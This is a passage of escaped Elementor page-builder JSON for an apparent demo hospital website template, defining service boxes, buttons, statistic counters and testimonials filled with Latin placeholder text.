"_id\":\"756a496\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"gjruaqu\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"dckxccw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-user-md\",\"title_text\":\"General Surgery\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"left\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"hx0bfps\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"98dsrav\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-hospital-o\",\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital\",\"position\":\"left\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"az3bsd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"p6fdudg\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-ambulance\",\"title_text\":\"Emergency Departments\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"right\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"qg9bbu9\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"ahzx2ew\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-wechat\",\"title_text\":\"24\\/7 Services\",\"description_text\":\"Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.\",\"position\":\"right\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"42yxmso\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#fcfcfc\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#eaeaea\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e898dc3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"iulpcd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"m7heks5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Reserve now in our hospital\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"zq38c4y\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"9kdvz1o\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"y3vt4zr\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8088599\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1fhtv2k\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fnui4s\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_563214.jpg\",\"id\":144},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"hlxu9mu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Transplant Services\",\"description_text\":\"Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"k5ey6e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"vpd68pg\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"sp1hkvu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_957412.jpg\",\"id\":145},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"tfbwu8m\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"wiytuem\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"skqiyik\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fv7id0y\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_369542.jpg\",\"id\":143},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1fkclio\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Dental Clinic\",\"description_text\":\"Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"mtrt6oy\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xm3kst6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Register Now\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"background_color\":\"#01aef0\",\"hover_color\":\"#01aef0\",\"button_background_hover_color\":\"rgba(0,0,0,0)\",\"button_hover_border_color\":\"#01aef0\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"30\",\"bottom\":\"10\",\"left\":\"30\",\"isLinked\":false},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"960wyxr\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8dbf01c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8231wcp\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b8k6776\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":142,\"title\":\"saved hearts\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"ktjw2tm\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"gffdt05\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":6424,\"suffix\":\"+\",\"title\":\"happy patients\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"k1ny1cq\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"jegms49\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":1382,\"suffix\":\"+\",\"title\":\"doctors number\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"mjm18s4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"wsyu9mt\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":275,\"title\":\"saved lungs\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"t2gvx2f\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_159211.jpg\",\"id\":156},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8},\"padding\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ffe3375\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"cq7te54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"unlkljg\",\"elType\":\"widget\",\"settings\":{\"title\":\"What Our Patients Say\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ayvp0xr\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"rot3ixr\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"gx8goxj\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"deb0197\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"fc8q2qe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1gdmbbl\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_428339.jpg\",\"id\":153},\"testimonial_name\":\"Mike Wright\",\"testimonial_job\":\"Patient #1\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"eo56seo\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"y7o9kxz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_324658.jpg\",\"id\":152},\"testimonial_name\":\"Nancy Green\",\"testimonial_job\":\"Patient #3\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true},{\"id\":\"ea8zdxf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"jzgwrdz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_301284.jpg\",\"id\":151},\"testimonial_name\":\"Frances Lopez\",\"testimonial_job\":\"Patient #2\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"7fr075g\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"6kl9wra\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_91227.jpg\",\"id\":150},\"testimonial_name\":\"Nick Smith\",\"testimonial_job\":\"Patient 